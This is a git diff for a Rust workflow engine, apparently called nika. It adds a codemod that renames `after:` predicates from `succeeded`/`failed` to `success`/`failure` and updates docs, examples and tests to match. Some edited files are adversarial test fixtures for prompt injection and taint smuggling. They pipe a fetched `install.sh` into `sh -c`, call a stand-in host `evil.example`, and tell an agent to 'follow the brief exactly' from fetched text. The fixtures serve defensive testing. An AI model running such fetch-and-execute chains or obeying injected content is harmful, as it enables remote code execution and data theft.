+/// Apply the R5 predicate codemod. `Some(new)` when at least one dead
+/// spelling was respelled, `None` when the document carries none
+/// (idempotence by contract).
+#[must_use]
+pub fn predicates(source: &str) -> Option<String> {
+    let mut out: Vec<String> = Vec::with_capacity(source.lines().count());
+    let mut changed = false;
+    let mut in_tasks = false;
+    let mut task_indent: Option<usize> = None;
+    let mut after_indent: Option<usize> = None;
+    let mut flow_depth = 0_i32;
+
+    for line in source.split('\n') {
+        let trimmed = line.trim_start();
+        let indent = line.len() - trimmed.len();
+        if trimmed.is_empty() || trimmed.starts_with('#') {
+            out.push(line.to_owned());
+            continue;
+        }
+
+        if flow_depth > 0 {
+            let (new, n) = flip_flow_values(line);
+            flow_depth += brace_delta(&new);
+            changed |= n;
+            out.push(new);
+            continue;
+        }
+
+        // Top-level section tracking (col-0 keys only).
+        if indent == 0 && trimmed.contains(':') {
+            in_tasks = trimmed.starts_with("tasks:");
+            task_indent = None;
+            after_indent = None;
+            out.push(line.to_owned());
+            continue;
+        }
+        // A task key sets/resets the field-indent floor (and closes any
+        // after: block — sibling fields share the task's indent). The
+        // FIRST key line inside `tasks:` is a task key by position.
+        if in_tasks && is_key_line(trimmed) && task_indent.is_none_or(|ti| indent <= ti) {
+            task_indent = Some(indent);
+            after_indent = None;
+            out.push(line.to_owned());
+            continue;
+        }
+
+        // `after:` opener — a task FIELD only (guarded per the module
+        // doc): inside tasks:, indented under the task key.
+        if in_tasks && task_indent.is_some_and(|ti| indent > ti) && is_after_opener(trimmed) {
+            let rest = trimmed["after:".len()..].trim_start();
+            if rest.starts_with('{') {
+                let (new, n) = flip_flow_values(line);
+                changed |= n;
+                let depth = brace_delta(&new);
+                if depth > 0 {
+                    flow_depth = depth;
+                }
+                after_indent = None;
+                out.push(new);
+                continue;
+            }
+            after_indent = Some(indent);
+            out.push(line.to_owned());
+            continue;
+        }
+
+        // Inside an after: block — flip an exact dead-spelling VALUE.
+        if let Some(ai) = after_indent {
+            if indent <= ai {
+                after_indent = None;
+                out.push(line.to_owned());
+                continue;
+            }
+            if let Some(new) = flip_block_value(line) {
+                changed = true;
+                out.push(new);
+                continue;
+            }
+        }
+        out.push(line.to_owned());
+    }
+
+    changed.then(|| out.join("\n"))
+}
+
+/// `after:` (block) or `after: {…` (flow) — the key itself, never a
+/// longer word (`aftermath:`) and never a quoted scalar.
+fn is_after_opener(trimmed: &str) -> bool {
+    trimmed == "after:" || trimmed.starts_with("after: ") || trimmed.starts_with("after:\t")
+}
+
+/// A `key:` line (a task key — its value is empty, a flow head, or a
+/// trailing comment); the key itself is one non-whitespace token (task
+/// ids are `\S+`-shaped by the parser's own id grammar).
+fn is_key_line(trimmed: &str) -> bool {
+    match trimmed.find(':') {
+        Some(i) => {
+            let (k, rest) = (&trimmed[..i], trimmed[i + 1..].trim_start());
+            !k.is_empty()
+                && !k.contains(char::is_whitespace)
+                && (rest.is_empty() || rest.starts_with('{') || rest.starts_with('#'))
+        }
+        None => false,
+    }
+}
+
+/// `'{'` minus `'}'` outside quotes — the flow-depth delta of one line.
+fn brace_delta(line: &str) -> i32 {
+    let mut depth = 0_i32;
+    let mut quote = None;
+    for c in line.chars() {
+        match (quote, c) {
+            (Some(q), c) if c == q => quote = None,
+            (None, '\'' | '"') => quote = Some(c),
+            (None, '{') => depth += 1,
+            (None, '}') => depth -= 1,
+            _ => {}
+        }
+    }
+    depth
+}
+
+/// Flip dead-spelling VALUES in flow entries (`key: value` followed by
+/// `,` / `}` / end-of-line) on one line. Returns the line and whether
+/// it changed.
+fn flip_flow_values(line: &str) -> (String, bool) {
+    let bytes = line.as_bytes();
+    let mut out = String::with_capacity(line.len());
+    let mut changed = false;
+    let mut i = 0_usize;
+    while i < bytes.len() {
+        let c = bytes[i] as char;
+        out.push(c);
+        i += 1;
+        if c != ':' {
+            continue;
+        }
+        // Value head: whitespace, then an optional quote, then the word.
+        let ws = i;
+        while i < bytes.len() && (bytes[i] as char).is_whitespace() {
+            i += 1;
+        }
+        let (quote, word_start) = match bytes.get(i).map(|b| *b as char) {
+            Some(q @ ('\'' | '"')) => (Some(q), i + 1),
+            _ => (None, i),
+        };
+        let mut end = word_start;
+        while end < bytes.len() && ((bytes[end] as char).is_alphanumeric() || bytes[end] == b'_') {
+            end += 1;
+        }
+        let word = &line[word_start..end];
+        let after_word = if quote.is_some() { end + 1 } else { end };
+        let closes = quote.is_none_or(|q| line[end..].starts_with(q));
+        let terminator_ok = closes
+            && matches!(
+                line[after_word.min(line.len())..]
+                    .trim_start()
+                    .chars()
+                    .next(),
+                None | Some(',' | '}')
+            );
+        if let Some((_, to)) = DEAD.iter().find(|(dead, _)| *dead == word)
+            && terminator_ok
+        {
+            out.push_str(&line[ws..word_start]);
+            out.push_str(to);
+            changed = true;
+            i = end;
+            continue;
+        }
+        out.push_str(&line[ws..end]);
+        i = end;
+    }
+    (out, changed)
+}
+
+/// Flip a block-form entry `key: succeeded  # comment` — only when the
+/// value IS exactly the dead spelling (bare or quoted). Returns the
+/// rewritten line.
+fn flip_block_value(line: &str) -> Option<String> {
+    let colon = line.find(':')?;
+    let value = line[colon + 1..].trim_start();
+    for (dead, to) in DEAD {
+        for (open, close) in [("", ""), ("'", "'"), ("\"", "\"")] {
+            let token = format!("{open}{dead}{close}");
+            if let Some(rest) = value.strip_prefix(token.as_str())
+                && (rest.is_empty()
+                    || rest.starts_with(char::is_whitespace) && rest.trim_start().starts_with('#')
+                    || rest.trim().is_empty())
+            {
+                let head = &line[..=colon];
+                let gap = &line[colon + 1..line.len() - value.len()];
+                return Some(format!("{head}{gap}{open}{to}{close}{rest}"));
+            }
+        }
+    }
+    None
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn flow_same_line_flips_every_entry_and_keeps_the_shape() {
+        let src = "tasks:\n  a:\n    exec: { command: [true] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [true] }\n";
+        let out = predicates(src).expect("changed");
+        assert!(out.contains("after: { a: success }"), "{out}");
+        assert!(!out.contains("succeeded"), "{out}");
+    }
+
+    #[test]
+    fn flow_multi_entry_and_failure_flip() {
+        let src =
+            "tasks:\n  b:\n    after: { a: failed, c: succeeded }\n    exec: { command: [true] }\n";
+        let out = predicates(src).expect("changed");
+        assert!(out.contains("after: { a: failure, c: success }"), "{out}");
+    }
+
+    #[test]
+    fn block_form_flips_and_preserves_comments_and_order() {
+        let src = "tasks:\n  b:\n    after:\n      a: succeeded   # the gate\n      c: failed\n    exec: { command: [true] }\n";
+        let out = predicates(src).expect("changed");
+        assert!(out.contains("a: success   # the gate"), "{out}");
+        assert!(out.contains("c: failure\n"), "{out}");
+    }
+
+    #[test]
+    fn quoted_values_flip_preserving_the_quotes() {
+        let src = "tasks:\n  b:\n    after:\n      a: 'succeeded'\n      c: \"failed\"\n    exec: { command: [true] }\n";
+        let out = predicates(src).expect("changed");
+        assert!(out.contains("a: 'success'"), "{out}");
+        assert!(out.contains("c: \"failure\""), "{out}");
+    }
+
+    #[test]
+    fn when_status_comparisons_are_never_touched() {
+        // The DAG-007 class is another law's object (the did-you-mean
+        // died spec-side · LAW-GRAMMAR-0231) — the codemod is after:-only.
+        let src = "tasks:\n  b:\n    with: { s: \"${{ tasks.a.status }}\" }\n    when: ${{ with.s == 'failed' }}\n    exec: { command: [true] }\n";
+        assert_eq!(predicates(src), None);
+    }
+
+    #[test]
+    fn a_task_named_succeeded_keeps_its_key() {
+        let src = "tasks:\n  succeeded:\n    exec: { command: [true] }\n  b:\n    after: { succeeded: succeeded }\n    exec: { command: [true] }\n";
+        let out = predicates(src).expect("changed");
+        assert!(out.contains("  succeeded:\n"), "{out}");
+        assert!(out.contains("after: { succeeded: success }"), "{out}");
+    }
+
+    #[test]
+    fn a_task_named_after_never_opens_a_block() {
+        let src = "tasks:\n  after:\n    exec: { command: [true] }\n    shell: failed\n";
+        assert_eq!(predicates(src), None);
+    }
+
+    #[test]
+    fn prose_and_body_strings_are_never_touched() {
+        let src = "tasks:\n  b:\n    after: { a: success }\n    infer: { prompt: \"run when the build failed or succeeded\" }\n";
+        assert_eq!(predicates(src), None, "already R5 + prose strings");
+    }
+
+    #[test]
+    fn idempotence_a_migrated_document_returns_none() {
+        let src = "tasks:\n  b:\n    after:\n      a: succeeded\n    exec: { command: [true] }\n";
+        let once = predicates(src).expect("changed");
+        assert_eq!(predicates(&once), None);
+    }
+
+    #[test]
+    fn multiline_flow_flips_and_closes() {
+        let src = "tasks:\n  b:\n    after: {\n      a: succeeded,\n      c: failed }\n    exec: { command: [true] }\n";
+        let out = predicates(src).expect("changed");
+        assert!(out.contains("a: success,"), "{out}");
+        assert!(out.contains("c: failure }"), "{out}");
+        assert!(out.contains("exec: { command: [true] }"), "{out}");
+    }
+
+    #[test]
+    fn comment_lines_and_block_scalars_are_left_alone() {
+        let src = "# after: {a: succeeded}\ntasks:\n  b:\n    after: { a: success }\n    exec:\n      shell: |\n        echo succeeded\n";
+        assert_eq!(predicates(src), None);
+    }
+}

--- a/crates/nika-onboard/src/briefs.rs
+++ b/crates/nika-onboard/src/briefs.rs
@@ -68,7 +68,7 @@ or MCP tool) · `agent` (a multi-turn ReAct loop).
 - One verb per task · the verb IS the task key (never a `verb:` field).
 - `tasks.X` crosses a task boundary only through `with:` (the binding IS the
   data edge — the body reads `${{ with.<name> }}`, never `tasks.*` directly)
-  or `after: {X: succeeded}` (control · predicates `succeeded` · `failed` ·
+  or `after: {X: success}` (control · predicates `success` · `failure` ·
   `skipped` · `terminal`). `depends_on` is dead (`check --fix` migrates).
 - Quote any YAML scalar that STARTS with `${{` (an unquoted leading `${{`
   breaks the parse).
@@ -145,7 +145,7 @@ Envelope: `nika: v1` (always · frozen forever). Extensions: `.nika.yaml` (canon
 - Interpolation uses `${{ vars.x }}` · `${{ tasks.id.output }}` · `${{ env.KEY }}` · `${{ with.alias }}`.
 - Bindings use `with: { alias: ${{ tasks.id.output }} }` then `${{ with.alias }}`.
 - Models use the combined form `provider/name` (for example `mock/echo`, `ollama/qwen3.5:4b`, `mistral/mistral-small`).
-- Edges are declared, never restated: a `with:` binding reading `${{ tasks.id.output }}` IS the data edge · `after: { task_id: succeeded }` is the control edge (predicates: `succeeded` · `failed` · `skipped` · `terminal`). `depends_on` is dead — `nika check --fix` migrates it.
+- Edges are declared, never restated: a `with:` binding reading `${{ tasks.id.output }}` IS the data edge · `after: { task_id: success }` is the control edge (predicates: `success` · `failure` · `skipped` · `terminal`). `depends_on` is dead — `nika check --fix` migrates it.
 - Secrets are declared in a top-level `secrets:` block (e.g. `source: env`, `key: MY_KEY`) and referenced as `${{ secrets.name }}` — never inline literal keys; `${{ env.* }}` is for non-sensitive configuration.
 - After every edit, run `nika check <file>` — `--fix` heals the mechanical
   renames, the diagnostics teach the rest.
@@ -174,7 +174,7 @@ Rules the validator enforces:
 - Envelope `nika: v1` · one verb per task (`infer` · `exec` · `invoke` ·
   `agent`) · the verb IS the task key.
 - `tasks.X` is read at the boundary only: `with: { alias: ${{ tasks.X.output }} }`
-  is the data edge · `after: { X: succeeded }` orders without data · the
+  is the data edge · `after: { X: success }` orders without data · the
   body reads `${{ with.alias }}`.
 - `invoke` arguments live under `args:` · secrets come from the
   environment (`${{ secrets.X }}`) — never inline.

--- a/crates/nika-pack/pack/canon.yaml
+++ b/crates/nika-pack/pack/canon.yaml
@@ -323,7 +323,7 @@ error_codes:
     # edge (derived, never restated) and a reference outside the boundary is
     # NIKA-VAR-021. The allocation hole is deliberate.
     - { code: NIKA-DAG-004, category: validation_error, transient: "false", failure: "on_error.recover references a task downstream of the declaring task (await would deadlock)" }
-    - { code: NIKA-DAG-005, category: validation_error, transient: "false", failure: "after: predicate outside the closed set (succeeded · failed · skipped · terminal)" }
+    - { code: NIKA-DAG-005, category: validation_error, transient: "false", failure: "after: predicate outside the closed set (success · failure · skipped · terminal)" }
     - { code: NIKA-DAG-006, category: validation_error, transient: "false", failure: "statically dead task — an incoming edge's pass-set excludes every reachable producer state, or the when: gate is false under every reachable upstream combination (gate algebra v2)" }
     - { code: NIKA-DAG-007, category: validation_error, transient: "false", failure: "status compared against a literal outside the vocabulary (success · failure · skipped · cancelled) — == never matches, != always holds" }
     - { code: NIKA-TYPE-001, category: validation_error, transient: "false", failure: "unknown type name (in types: · returns: · an outputs: type) — did-you-mean when close" }

--- a/crates/nika-pack/pack/examples/manifest.yaml
+++ b/crates/nika-pack/pack/examples/manifest.yaml
@@ -36,7 +36,7 @@ templates:
   - file: templates/gate-and-act.nika.yaml
     sha256_16: c5a5ddffb34fb354
   - file: templates/human-gated-ship.nika.yaml
-    sha256_16: c2c3d0baa7f42778
+    sha256_16: 77235a1ba4dabde2
   - file: templates/media-asset-pack.nika.yaml
     sha256_16: c266549579fabf12
   - file: templates/website-brief.nika.yaml
@@ -53,7 +53,7 @@ showcase:
     tier: T1
     description: ""
     constructs: [local_model, outputs, schema, typed_vars, with]
-    sha256_16: c47888a9daf8a3f1
+    sha256_16: c945aecc02ed7d09
   - file: examples/showcase/t1-og-images.nika.yaml
     workflow: {'id': 'og-images', 'description': 'Generate the launch OG hero image set into ./assets/og'}
     tier: T1
@@ -89,13 +89,13 @@ showcase:
     tier: T2
     description: ""
     constructs: [local_model, outputs, schema, typed_vars, with]
-    sha256_16: 398fd0b97ae3ff85
+    sha256_16: e5f0b4eb80e3a3ed
   - file: examples/showcase/t2-csv-chart-report.nika.yaml
     workflow: {'id': 'csv-chart-report', 'description': 'CSV → aggregate → rendered bar chart + markdown report · offline · deterministic'}
     tier: T2
     description: ""
     constructs: [outputs, with]
-    sha256_16: ff7abf7cd2503387
+    sha256_16: d2d9bdbc5b5418a0
   - file: examples/showcase/t2-etl-quarantine.nika.yaml
     workflow: {'id': 'etl-quarantine', 'description': 'CSV batch → schema gate → quarantine the bad · aggregate the good'}
     tier: T2
@@ -119,7 +119,7 @@ showcase:
     tier: T2
     description: ""
     constructs: [local_model, outputs, schema, secrets, with]
-    sha256_16: 079992f83bdf21e5
+    sha256_16: 01886e155fbc064b
   - file: examples/showcase/t2-release-radar.nika.yaml
     workflow: {'id': 'release-radar', 'description': 'dependency release feed → diff vs last run → only the NEW ships'}
     tier: T2
@@ -149,7 +149,7 @@ showcase:
     tier: T3
     description: ""
     constructs: [fail_fast, for_each, local_model, max_parallel, on_error, output, outputs, retry, secrets, timeout, with]
-    sha256_16: 5a631c501375e34f
+    sha256_16: ed194744e3f231a2
   - file: examples/showcase/t3-config-drift-sentinel.nika.yaml
     workflow: {'id': 'config-drift-sentinel', 'description': 'live config vs sanctioned baseline → typed drift → explained alert'}
     tier: T3
@@ -179,7 +179,7 @@ showcase:
     tier: T4
     description: ""
     constructs: [local_model, on_finally, output, outputs, secrets, thinking, with]
-    sha256_16: e913bb53bab1f9d3
+    sha256_16: fbb12bbb8c044e33
   - file: examples/showcase/t4-deep-research-brief.nika.yaml
     workflow: {'id': 'deep-research-brief', 'description': 'plan → budgeted research agent → thinking synthesis → brief on disk'}
     tier: T4
@@ -191,10 +191,10 @@ showcase:
     tier: T4
     description: ""
     constructs: [capture, local_model, on_finally, outputs, retry, schema, secrets, thinking, with]
-    sha256_16: fb3c76ec35e3efda
+    sha256_16: d6c121c50d7d1325
   - file: examples/showcase/t4-release-train.nika.yaml
     workflow: {'id': 'release-train', 'description': 'parallel gates → human GO → hold until the window → ship · verify · record'}
     tier: T4
     description: ""
     constructs: [capture, on_finally, outputs, retry, secrets, timeout, typed_vars, with]
-    sha256_16: b4f4a460a41c9f7e
+    sha256_16: 1626fe329b4aff50

--- a/crates/nika-pack/pack/examples/showcase/t1-meeting-actions.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t1-meeting-actions.nika.yaml
@@ -65,7 +65,7 @@ tasks:
 
   trace:
     after:
-      extract: succeeded
+      extract: success
     invoke:
       tool: "nika:log"
       args:

--- a/crates/nika-pack/pack/examples/showcase/t2-contract-guard.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t2-contract-guard.nika.yaml
@@ -11,7 +11,7 @@
 #   - sovereignty · `model: ollama/qwen3.5:4b`: sensitive docs stay local
 #   - `nika:validate` · re-check the extraction against a stricter schema
 #   - `nika:assert` · the fail-fast guard (vs `when:` · the skip-guard)
-#   - `after: succeeded` · the memo is control-gated on the assert
+#   - `after: success` · the memo is control-gated on the assert
 #   - belt-and-braces · schema at infer time + validate + assert downstream
 #
 # Run · nika run examples/showcase/t2-contract-guard.nika.yaml --var contract_path=./contract.md
@@ -86,7 +86,7 @@ tasks:
     with:
       clauses: ${{ tasks.clauses.output.clauses }}
     after:
-      gate: succeeded              # state, no data · the assert passed or the memo is cancelled
+      gate: success              # state, no data · the assert passed or the memo is cancelled
     infer:
       prompt: |
         Write a one-page risk memo from these clauses ·

--- a/crates/nika-pack/pack/examples/showcase/t2-csv-chart-report.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t2-csv-chart-report.nika.yaml
@@ -96,7 +96,7 @@ tasks:
     with:
       rows_md: ${{ tasks.rows_md.output }}
     after:
-      chart: succeeded
+      chart: success
     invoke:
       tool: "nika:write"
       args:

--- a/crates/nika-pack/pack/examples/showcase/t2-release-notes.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t2-release-notes.nika.yaml
@@ -75,7 +75,7 @@ tasks:
     with:
       notes_headline: ${{ tasks.notes.output.headline }}
     after:
-      changelog: succeeded
+      changelog: success
     invoke:
       tool: "nika:notify"
       args:

--- a/crates/nika-pack/pack/examples/showcase/t3-competitor-radar.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t3-competitor-radar.nika.yaml
@@ -86,7 +86,7 @@ tasks:
 
   ping:
     after:
-      save: succeeded
+      save: success
     invoke:
       tool: "nika:notify"
       args:

--- a/crates/nika-pack/pack/examples/showcase/t4-ceo-monday-brief.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t4-ceo-monday-brief.nika.yaml
@@ -122,7 +122,7 @@ tasks:
   # ── the run reports its own bill ──
   bill:
     after:
-      save: succeeded                # state, no data · read the meter once the brief landed
+      save: success                # state, no data · read the meter once the brief landed
     invoke:
       tool: "nika:inspect"
       args: { view: cost }

--- a/crates/nika-pack/pack/examples/showcase/t4-incident-war-room.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t4-incident-war-room.nika.yaml
@@ -94,14 +94,14 @@ tasks:
   # ── settle, then confirm recovery before claiming it ──
   settle:
     after:
-      timeline: succeeded
+      timeline: success
     invoke:
       tool: "nika:wait"
       args: { duration: "60s" }
 
   recheck:
     after:
-      settle: succeeded
+      settle: success
     invoke:
       tool: "nika:fetch"
       args:
@@ -123,7 +123,7 @@ tasks:
     with:
       events: ${{ tasks.timeline.output.events }}
     after:
-      confirmed: succeeded             # state, no data · recovery proven or no draft
+      confirmed: success             # state, no data · recovery proven or no draft
     infer:
       model: anthropic/claude-sonnet-4-6   # per-task override · thinking budget
       prompt: |

--- a/crates/nika-pack/pack/examples/showcase/t4-release-train.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t4-release-train.nika.yaml
@@ -81,7 +81,7 @@ tasks:
     with:
       t0: ${{ tasks.t0.output }}
     after:
-      gates_green: succeeded           # state, no data · the timing is only worth taking on a green board
+      gates_green: success           # state, no data · the timing is only worth taking on a green board
     invoke:
       tool: "nika:date"
       args:
@@ -112,7 +112,7 @@ tasks:
   # ── hold until the window · absolute time, not a sleep ──
   hold:
     after:
-      approved: succeeded
+      approved: success
     invoke:
       tool: "nika:wait"
       args:
@@ -121,7 +121,7 @@ tasks:
 
   ship:
     after:
-      hold: succeeded
+      hold: success
     exec:
       command: ["./scripts/release.sh", "${{ inputs.version }}"]   # argv: the interpolation cannot break out
       capture: structured
@@ -129,7 +129,7 @@ tasks:
 
   verify:
     after:
-      ship: succeeded
+      ship: success
     invoke:
       tool: "nika:fetch"
       args:

--- a/crates/nika-pack/pack/templates/human-gated-ship.nika.yaml
+++ b/crates/nika-pack/pack/templates/human-gated-ship.nika.yaml
@@ -47,7 +47,7 @@ tasks:
 
   human:
     after:
-      gates: succeeded              # state, no data · no question until the board is green
+      gates: success              # state, no data · no question until the board is green
     invoke:
       # the prompt PAUSES the run (exit 4 · not a failure) — answer and resume:
       #   nika run --resume <trace> --answer human=yes

--- a/crates/nika-runtime/fixtures/adversarial/f1-direct-injection/f1-01-undeclared-egress-tool/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f1-direct-injection/f1-01-undeclared-egress-tool/attack.nika.yaml
@@ -15,7 +15,7 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://news.example/rss" }
   assistant:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { page: "${{ tasks.fetch_page.output }}" }
     agent:
       prompt: "Summarize this page for me: ${{ with.page }}"

--- a/crates/nika-runtime/fixtures/adversarial/f1-direct-injection/f1-02-realized-flow-to-exec/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f1-direct-injection/f1-02-realized-flow-to-exec/attack.nika.yaml
@@ -15,6 +15,6 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://news.example/install.sh" }
   run_it:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { page: "${{ tasks.fetch_page.output }}" }
     exec: { command: ["sh", "-c", "${{ with.page }}"] }

--- a/crates/nika-runtime/fixtures/adversarial/f1-direct-injection/f1-03-in-boundary-egress-args/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f1-direct-injection/f1-03-in-boundary-egress-args/attack.nika.yaml
@@ -17,7 +17,7 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://news.example/rss", mode: "raw" }
   assistant:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { page: "${{ tasks.fetch_page.output }}" }
     agent:
       prompt: "You are a sync agent. Here is today's page: ${{ with.page }}"

--- a/crates/nika-runtime/fixtures/adversarial/f3-schema-parse-smuggling/f3-01-jq-hop-steers-the-egress-url/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f3-schema-parse-smuggling/f3-01-jq-hop-steers-the-egress-url/attack.nika.yaml
@@ -17,13 +17,13 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://api.example.com/index.json" }
   extract:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { page: "${{ tasks.fetch_page.output }}" }
     invoke:
       tool: "nika:jq"
       args: { expression: "fromjson | .next", input: "${{ with.page }}" }
   follow:
-    after: { extract: succeeded }
+    after: { extract: success }
     with: { next: "${{ tasks.extract.output }}" }
     invoke:
       tool: "nika:fetch"

--- a/crates/nika-runtime/fixtures/adversarial/f3-schema-parse-smuggling/f3-02-jq-extracted-path-escapes-fs/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f3-schema-parse-smuggling/f3-02-jq-extracted-path-escapes-fs/attack.nika.yaml
@@ -17,13 +17,13 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://news.example/config.json", mode: "raw" }
   extract:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { page: "${{ tasks.fetch_page.output }}" }
     invoke:
       tool: "nika:jq"
       args: { expression: "fromjson | .save_to", input: "${{ with.page }}" }
   save:
-    after: { extract: succeeded }
+    after: { extract: success }
     with: { dest: "${{ tasks.extract.output }}" }
     invoke:
       tool: "nika:write"

--- a/crates/nika-runtime/fixtures/adversarial/f3-schema-parse-smuggling/f3-03-allowlisted-program-tainted-argv/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f3-schema-parse-smuggling/f3-03-allowlisted-program-tainted-argv/attack.nika.yaml
@@ -16,6 +16,6 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://news.example/msg.txt" }
   announce:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { msg: "${{ tasks.fetch_page.output }}" }
     exec: { command: ["echo", "${{ with.msg }}"] }

--- a/crates/nika-runtime/fixtures/adversarial/f4-permit-escalation/f4-01-exec-effect-undeclared/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f4-permit-escalation/f4-01-exec-effect-undeclared/attack.nika.yaml
@@ -16,6 +16,6 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://news.example/install.txt" }
   run_it:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { cmd: "${{ tasks.fetch_page.output }}" }
     exec: { command: ["${{ with.cmd }}"] }

--- a/crates/nika-runtime/fixtures/adversarial/f4-permit-escalation/f4-02-program-outside-allowlist/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f4-permit-escalation/f4-02-program-outside-allowlist/attack.nika.yaml
@@ -16,6 +16,6 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://news.example/tool.txt" }
   run_it:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { prog: "${{ tasks.fetch_page.output }}" }
     exec: { command: ["${{ with.prog }}", "-s", "https://evil.example/x"] }

--- a/crates/nika-runtime/fixtures/adversarial/f4-permit-escalation/f4-03-agent-reads-outside-fs-boundary/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f4-permit-escalation/f4-03-agent-reads-outside-fs-boundary/attack.nika.yaml
@@ -18,7 +18,7 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://news.example/brief.txt", mode: "raw" }
   assistant:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { brief: "${{ tasks.fetch_page.output }}" }
     agent:
       prompt: "Follow the brief exactly: ${{ with.brief }}"

--- a/crates/nika-runtime/fixtures/adversarial/f5-multi-hop-laundering/f5-01-fetch-infer-notify/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f5-multi-hop-laundering/f5-01-fetch-infer-notify/attack.nika.yaml
@@ -17,11 +17,11 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://api.example.com/data" }
   summarize:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { page: "${{ tasks.fetch_page.output }}" }
     infer: { prompt: "tldr: ${{ with.page }}", max_tokens: 99 }
   tell:
-    after: { summarize: succeeded }
+    after: { summarize: success }
     with: { summary: "${{ tasks.summarize.output }}" }
     invoke:
       tool: "nika:notify"

--- a/crates/nika-runtime/fixtures/adversarial/f5-multi-hop-laundering/f5-02-fan-out-fan-in/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f5-multi-hop-laundering/f5-02-fan-out-fan-in/attack.nika.yaml
@@ -15,17 +15,17 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://api.example.com/data" }
   extract:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { page: "${{ tasks.fetch_page.output }}" }
     invoke:
       tool: "nika:jq"
       args: { expression: "fromjson | .headline", input: "${{ with.page }}" }
   summarize:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { page: "${{ tasks.fetch_page.output }}" }
     infer: { prompt: "tldr: ${{ with.page }}", max_tokens: 99 }
   broadcast:
-    after: { extract: succeeded, summarize: succeeded }
+    after: { extract: success, summarize: success }
     with:
       headline: "${{ tasks.extract.output }}"
       summary: "${{ tasks.summarize.output }}"

--- a/crates/nika-runtime/fixtures/adversarial/f5-multi-hop-laundering/f5-03-laundered-into-the-agent/attack.nika.yaml
+++ b/crates/nika-runtime/fixtures/adversarial/f5-multi-hop-laundering/f5-03-laundered-into-the-agent/attack.nika.yaml
@@ -18,13 +18,13 @@ tasks:
       tool: "nika:fetch"
       args: { url: "https://news.example/notes.json" }
   extract:
-    after: { fetch_page: succeeded }
+    after: { fetch_page: success }
     with: { page: "${{ tasks.fetch_page.output }}" }
     invoke:
       tool: "nika:jq"
       args: { expression: "fromjson | .note", input: "${{ with.page }}" }
   assistant:
-    after: { extract: succeeded }
+    after: { extract: success }
     with: { note: "${{ tasks.extract.output }}" }
     agent:
       prompt: "Act on this note: ${{ with.note }}"

--- a/crates/nika-runtime/src/pause.rs
+++ b/crates/nika-runtime/src/pause.rs
@@ -284,7 +284,7 @@ mod tests {
         use nika_event::EventKind;
         use nika_kernel::tool_executor::{ToolErrorMeta, ToolResult};
 
-        const GATED: &str = "nika: v1\nworkflow:\n  id: gated\ntasks:\n  prep:\n    exec: { command: [\"echo\", \"ready\"] }\n  ask:\n    after: { prep: succeeded }\n    invoke:\n      tool: \"nika:prompt\"\n      args: { mode: \"input\", message: \"proceed?\" }\n  finish:\n    after: { ask: succeeded }\n    exec: { command: [\"echo\", \"done\"] }\n";
+        const GATED: &str = "nika: v1\nworkflow:\n  id: gated\ntasks:\n  prep:\n    exec: { command: [\"echo\", \"ready\"] }\n  ask:\n    after: { prep: success }\n    invoke:\n      tool: \"nika:prompt\"\n      args: { mode: \"input\", message: \"proceed?\" }\n  finish:\n    after: { ask: success }\n    exec: { command: [\"echo\", \"done\"] }\n";
 
         let blocked_prompt = || {
             let mut result = ToolResult::error("tc1", "non-interactive and no `default:`");

--- a/crates/nika-runtime/src/recover/tests.rs
+++ b/crates/nika-runtime/src/recover/tests.rs
@@ -177,7 +177,7 @@ tasks:
   base:
     exec: { command: ["echo", "base"] }
   c:
-    after: { base: succeeded }
+    after: { base: success }
     exec: { command: ["echo", "42"] }
 "#;
     let shell = MockShell::new()
@@ -219,7 +219,7 @@ tasks:
   base:
     exec: { command: ["echo", "base"] }
   source:
-    after: { base: succeeded }
+    after: { base: success }
     when: false
     exec: { command: ["echo", "never"] }
 "#;
@@ -293,7 +293,7 @@ tasks:
   done:
     exec: { command: ["echo", "ok"] }
   risky:
-    after: { done: succeeded }
+    after: { done: success }
     exec: { shell: "exit 1" }
     on_error:
       recover: ${{ tasks.done.output.missing }}

